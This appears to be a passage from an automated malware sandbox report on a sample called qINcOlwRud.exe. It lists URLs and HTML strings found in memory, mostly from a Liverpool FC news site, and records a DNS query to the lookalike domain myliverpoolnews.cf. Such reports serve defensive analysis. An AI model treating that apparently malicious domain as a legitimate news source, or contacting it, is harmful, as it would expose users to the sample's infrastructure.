content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
            Source: unknownDNS traffic detected: queries for: myliverpoolnews.cf
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
            Source: svchost.exe, 0000000B.00000003.266602671.000001BDC7899000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
            Source: qINcOlwRud.exe, 00000000.00000002.270729266.0000000002FF1000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf
            Source: qINcOlwRud.exe, 00000000.00000002.270729266.0000000002FF1000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmp, svchost.exe, 0000000B.00000003.266602671.000001BDC7899000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
            Source: qINcOlwRud.exe, 00000000.00000002.270729266.0000000002FF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: svchost.exe, 00000015.00000002.325607355.0000023ABEC13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com:
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
            Source: svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
            Source: svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000015.00000002.326740904.0000023ABEC4B000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.314007807.0000023ABEC40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
            Source: svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000015.00000002.326740904.0000023ABEC4B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000015.00000002.326740904.0000023ABEC4B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000015.00000002.327217757.0000023ABEC64000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
            Source: qINcOlwRud.exe, 00000000.00000002.271085318.0000000003020000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal
            Source: qINcOlwRud.exe, 00000000.00000002.271085318.0000000003020000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf4
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
            Source: svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000015.00000002.325607355.0000023ABEC13000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000015.00000003.314338575.0000023ABEC45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000015.00000003.314338575.0000023ABEC45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000015.00000002.326324618.0000023ABEC39000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000015.00000003.314649604.0000023ABEC54000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
